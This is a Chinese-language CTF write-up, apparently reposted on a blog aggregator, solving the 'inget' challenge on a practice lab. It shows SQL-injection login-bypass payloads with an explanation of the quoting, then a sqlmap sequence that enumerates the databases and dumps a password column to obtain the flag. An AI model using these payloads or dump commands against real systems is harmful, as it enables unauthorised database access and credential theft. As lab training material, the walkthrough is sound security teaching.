攻防世界-inget(简单的SQL注入、万能密码)

这篇具有很好参考价值的文章主要介绍了攻防世界-inget(简单的SQL注入、万能密码)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

1、手工注入(万能密码原理)

2、sqlmap实现

3、常用参数


1、手工注入(万能密码原理)

打开链接,提示输入id并尝试绕过

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

 尝试一下万能密码,使用逻辑语句使结果返回

构造payload

/?id=' or ''='

我们这里是以get传参的方式在前端给id传了个值,后端会对我们提交的内容进行查询

比如我们提交的是 id=123

而到后端大概会呈现出来的部分内容就是 'id=123'

会有单引号将这个内容引起来进行查询

这样我们就好理解上面payload的原理了

我们传入 id=' or ''='     实际上到了后端大概是这样子 'id=' or ''=''

对于我们传入的四个单引号的解释:

第一个单引号,与查询时前面的单引号形成闭合;

第二个单引号,与查询时后面的单引号形成闭合;

第三和第四个单引号实际上只是使等号成立的内容,即'='

我们知道or的两边只要有一边成立,结果就为真,而 单引号=单引号 这个肯定是恒成立的

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全 

我们将 '=' 换成  1=1 也是可以的

即payload

/?id=' or '1=1

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

 这里还有一个payload

/?id=' or 1=1 -- +

第一个单引号同样是与查询时前面的单引号形成闭合,而 --+ 起注释作用,将后面的语句注释掉

更多详细的SQL手工注入基础知识及流程可参考我前面的博客

http://t.csdn.cn/mFNQA

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

 结果一样

得到 Flag Is : cyberpeace{818e277716501adc71a98b501c4d7a99}

2、sqlmap实现

下面我们使用sqlmap来注入

关于sqlmap的介绍和使用也在前面的博客中有详细介绍,可以参考

http://t.csdn.cn/8xeJ1


先用sqlmap大概检查一下

sqlmap -u "http://61.147.171.105:54285/?id=1"

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

尝试列出所以数据库

sqlmap -u "http://61.147.171.105:54285/?id=1" --dbs 
 攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

可以看到有一个名为cyber的数据库,我们指定列出它的表

列出指定数据库的表

sqlmap -u "http://61.147.171.105:54285/?id=1" -D cyber --tables 

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

 可以看到这个数据库里只有一个表,且和数据库同名

我们继续列出指定表的字段

sqlmap -u "http://61.147.171.105:54285/?id=1" -D cyber -T cyber --columns 

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

 尝试获取指定字段中的数据

sqlmap -u "http://61.147.171.105:54285/?id=1" -D cyber -T cyber -C pw --dump

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

攻防世界sql注入,web,SQL,CTF,数据库,sql注入,sqlmap,万能密码,网络安全

 拿到flag

cyberpeace{818e277716501adc71a98b501c4d7a99}

3、常用参数

总结一些sqlmap常用的参数:

-D 选择使用哪个数据库

-T 选择使用哪个表

-C 选择使用哪个列

--tables 列出当前的表

--columns 列出当前的列

--dump 获取字段中的数据文章来源地址https://www.toymoban.com/news/detail-638431.html

到了这里,关于攻防世界-inget(简单的SQL注入、万能密码)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Web攻防--Java_SQL注入--XXE注入-- SSTI模板注入--SPEL表达式注入

    编译器在编译sql语句时,会依次进行词法分析、语法分析、语义分析等操作, 预编译技术会让数据库跳过编译阶段,也就无法就进行词法分析,不会被拆开,注入语句也就不会被识别为SQL的,从而防止恶意注入语句改变原有SQL语句本身逻辑。 在使用JDBC进行数据

    2024年02月09日
    浏览(59)
  • 小迪安全25WEB 攻防-通用漏洞&SQL 读写注入&MYSQL&MSSQL&PostgreSQL

       #知识点:  1、SQL 注入-MYSQL 数据库  2、SQL 注入-MSSQL(SQL server) 数据库  3、SQL 注入-PostgreSQL 数据库  #详细点:  Access 无高权限注入点-只能猜解,还是暴力猜解           因为access的数据库是独立存在的,不存在统一管理 对账号密码进行猜解,此时只是获取到后台的操

    2024年02月20日
    浏览(58)
  • 28、web攻防——通用漏洞&SQL注入&HTTP头XFF&COOKIE&POST请求

    $_GET :接收get请求,传输少量数据,URL是有长度限制的; $_POST :接收post请求; $_COOKIE :接收cookie,用于身份验证; $_REQUEST :收集通过 GET 、POST和COOKIE 方法发送的表单数据; $_SERVER :接收数据包中的一些内容,如浏览器信息、当前访问url地址等; 网站功能点: 后台要记录

    2024年01月19日
    浏览(54)
  • 【网络攻防技术】实验八——SQL注入实验

    SQL注入是一种代码注入技术,它利用web应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在web应用程序中正确检查时,就会出现此漏洞。许多web应用程序从用户处获取输

    2024年02月08日
    浏览(31)
  • 网络攻防期末大作业选题:防sql注入的登录网站【网络攻防CTF】(保姆级图文)

    欢迎关注 『网络攻防CTF』 系列,持续更新中 欢迎关注 『网络攻防CTF』 系列,持续更新中 数据库sql搭建 另存为 sql_test.sql 文件导入即可 项目结构如下: 为了美观引用了layui框架(也可以没有,只是样式) Login.html效果图如下: 输入用户名密码测试登陆。 html代码 layui文件可

    2024年02月07日
    浏览(48)
  • Web通用漏洞--sql注入

    mysql注入目的:获取当前web权限 MYSQL--Web组成架构 服务器搭建web服务可能存在多个站点搭建在一台服务器中,数据集中存储在数据库中,因此对数据库的管理也可以分为两种架构: 统一用户管理数据库,即对所有站点数据库的管理均为Root权限用户管理 一对一用户管理数据库

    2024年02月11日
    浏览(39)
  • web渗透之sql注入

    博主姓名:摆烂阳 博主主页面链接:传送门 新人入圈,希望博主的内容可以给大家带来帮助,有任何问题可以私信本人 摆烂阳从不摆烂滴 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先

    2023年04月08日
    浏览(34)
  • 【WEB安全】SQL注入挖掘

    2021年OWASP发布漏洞威胁榜单,SQL注入从第一名下降到第三(https://owasp.org/Top10/),SQL注入是一种常见的Web攻击技术,通过构造恶意的SQL语句来破坏数据库安全。攻击者可以通过提交带有恶意代码的输入,例如网页表单,来控制数据库执行恶意语句。这样,攻击者可以访问敏感

    2024年02月13日
    浏览(38)
  • Web安全-初识SQL注入(一)

    将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS 注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据。 注入能导致数据丢失、 破坏或泄露给无授权方,缺乏可审计性

    2024年02月05日
    浏览(47)
  • 《Web安全基础》03. SQL 注入

    本系列侧重方法论,各工具只是实现目标的载体。 命令与工具只做简单介绍,其使用另见《安全工具录》。 靶场使用 SQLi-Labs。详情参见《WriteUp:SQLi-Labs》 SQL 注入非常复杂,区分各种数据库类型,提交方法,数据类型等注入。此类漏洞是 WEB 安全中严重的漏洞,学习如何利

    2024年02月14日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包